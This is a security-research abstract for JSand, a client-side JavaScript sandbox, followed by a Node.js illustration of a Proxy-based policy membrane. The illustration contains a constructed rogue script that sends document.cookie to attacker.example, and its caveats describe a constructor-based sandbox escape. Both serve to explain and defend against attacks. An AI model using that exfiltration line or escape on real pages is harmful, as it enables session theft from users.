ABSTRACT
Including third-party scripts in web pages is common practice: a recent study found that more than half of the Alexa top 10,000 sites include scripts from more than five different origins. Such inclusions carry risk, because an included script runs with the full privileges of the including page and can read and modify its DOM, cookies and user data exactly as first-party code can.
We propose JSand, a server-driven but client-side JavaScript sandboxing framework. JSand requires no browser modifications: the sandboxing framework is itself written in JavaScript and is delivered to the browser by the websites that use it. Enforcement happens entirely on the client: JSand enforces a server-specified policy on included scripts without any server-side filtering or rewriting of those scripts. Most importantly, JSand is complete: every access to a resource is mediated by the sandbox.
We describe the design and implementation of JSand, and show that it is secure, backwards compatible, and performs sufficiently well.
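The abstract describes the mechanism only in outline: a policy chosen by the including site, shipped as JavaScript, and enforced in the browser by mediating every access the third-party script makes. The following is an added illustration of that idea, written for this page; it is not JSand's code and the page says nothing about how JSand is built internally. It uses ES2015 Proxy objects as a deny-by-default membrane around a constructed stand-in for the DOM, and a `with` block to make the proxied object the script's global scope. The policy format, the toy `document`, the two scripts and the `makeSandbox`/`demo` names are all assumptions made for the example, and it runs offline in Node.

```javascript
// Added illustration, not JSand's code: a deny-by-default Proxy membrane that
// mediates every access a third-party script makes to a constructed stand-in
// for the page's DOM. Policy shape, toy document and scripts are assumptions.

const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);

// Server-specified policy as the including site might ship it: per object kind,
// which properties may be read or written, and which methods may be called
// (with the kind of object each call hands back). Anything absent is denied.
const policy = {
  document: { read: ['title'], write: [],
              call: { getElementById: 'element', createElement: 'element' } },
  element:  { read: ['id', 'tagName', 'textContent'], write: ['textContent'],
              call: { appendChild: 'element' } },
};

// Constructed stand-in for the browser DOM so the example runs without a browser.
function makeFakeDocument() {
  const mk = (tagName, id) => ({
    tagName, id, textContent: '', children: [],
    appendChild(child) { this.children.push(child); return child; },
  });
  const byId = new Map([['ad-slot', mk('DIV', 'ad-slot')], ['checkout', mk('FORM', 'checkout')]]);
  return {
    title: 'Shop',
    cookie: 'session=SECRET',                          // must never reach the third party
    getElementById: (id) => byId.get(id) || null,
    createElement: (tag) => mk(tag.toUpperCase(), ''),
  };
}

function makeSandbox(policy, realDocument) {
  const violations = [];
  const unwrap = new WeakMap();                        // proxy -> real object
  const deny = (op, path) => {
    violations.push(`${op} ${path}`);
    throw new Error(`policy violation: ${op} ${path}`);
  };

  // Wrap a trusted object so every read, write and call is checked against policy[kind].
  function wrap(target, kind) {
    if (target === null || typeof target !== 'object') return target;   // primitives pass through
    const rules = policy[kind] || deny('expose', kind);
    const proxy = new Proxy(target, {
      get(t, prop) {
        if (typeof prop === 'symbol') return undefined;                 // Symbol.toPrimitive etc.
        if (hasOwn(rules.call, prop)) {
          const fn = t[prop];                                            // call with real `this` and real args
          return (...args) => wrap(fn.apply(t, args.map((a) => unwrap.get(a) ?? a)), rules.call[prop]);
        }
        if (rules.read.includes(prop)) {
          const v = t[prop];
          if (v !== null && typeof v === 'object') deny('read', `${kind}.${prop}`); // unlabelled object would leak
          return v;
        }
        return deny('read', `${kind}.${prop}`);
      },
      set(t, prop, value) {
        if (typeof prop === 'symbol' || !rules.write.includes(prop)) deny('write', `${kind}.${String(prop)}`);
        t[prop] = unwrap.get(value) ?? value;
        return true;
      },
      deleteProperty: (t, prop) => deny('delete', `${kind}.${String(prop)}`),
      defineProperty: (t, prop) => deny('define', `${kind}.${String(prop)}`),
      setPrototypeOf: () => deny('setPrototypeOf', kind),
    });
    unwrap.set(proxy, target);
    return proxy;
  }

  // The sandbox's global object: every free identifier in the script resolves here
  // first, and `has` answering true keeps lookups from reaching the real window.
  const globals = { document: wrap(realDocument, 'document'), undefined };
  const sandboxGlobal = new Proxy(globals, {
    has: () => true,
    get(t, prop) {
      if (typeof prop === 'symbol') return undefined;                   // Symbol.unscopables probe by `with`
      return hasOwn(t, prop) ? t[prop] : deny('read', `global.${prop}`);
    },
    set: (t, prop) => deny('write', `global.${String(prop)}`),
  });

  // The outer function is sloppy so `with` is legal; the script runs as a strict
  // inner function so its own `var`s stay in its scope and undeclared writes fail.
  function run(source) {
    const fn = new Function('__sandbox__',
      `with (__sandbox__) { (function () { "use strict"; ${source} })(); }`);
    try { fn(sandboxGlobal); return { ok: true }; }
    catch (e) { return { ok: false, error: e.message }; }
  }
  return { run, violations };
}

// Constructed third-party scripts: the first stays inside the policy, the second
// behaves like a compromised ad script trying to exfiltrate the session cookie.
const adScript = `
  var slot = document.getElementById('ad-slot');
  var banner = document.createElement('div');
  banner.textContent = 'Buy now!';
  slot.appendChild(banner);
`;
const rogueScript = `
  var form = document.getElementById('checkout');
  form.textContent = 'Pay here';                 // allowed by the policy
  var stolen = document.cookie;                  // denied: cookie is not readable
  new Image().src = 'https://attacker.example/?c=' + stolen;
`;

function demo() {
  const doc = makeFakeDocument();
  const sandbox = makeSandbox(policy, doc);
  const benign = sandbox.run(adScript);
  const rogue = sandbox.run(rogueScript);
  return {
    benign, rogue,
    violations: sandbox.violations,
    adText: doc.getElementById('ad-slot').children[0].textContent,
    checkoutText: doc.getElementById('checkout').textContent,
  };
}
```

Running `demo()` shows the benign script completing and the rogue one aborting at `document.cookie`, with the write it made before the violation still visible in the real document: mediation is per access, not per script. Two caveats a practitioner should keep in mind. First, the membrane only covers what the site chose to expose through it; the example leaves JavaScript's primordials untouched, so a script can still reach the real global through `(function () {}).constructor('return this')()`, and a complete sandbox must also freeze or replace those built-ins. Second, `has: () => true` means any name the policy does not list, including harmless ones like `Math`, is a violation, which is what makes the policy deny-by-default but also what drives the backwards-compatibility work the abstract mentions.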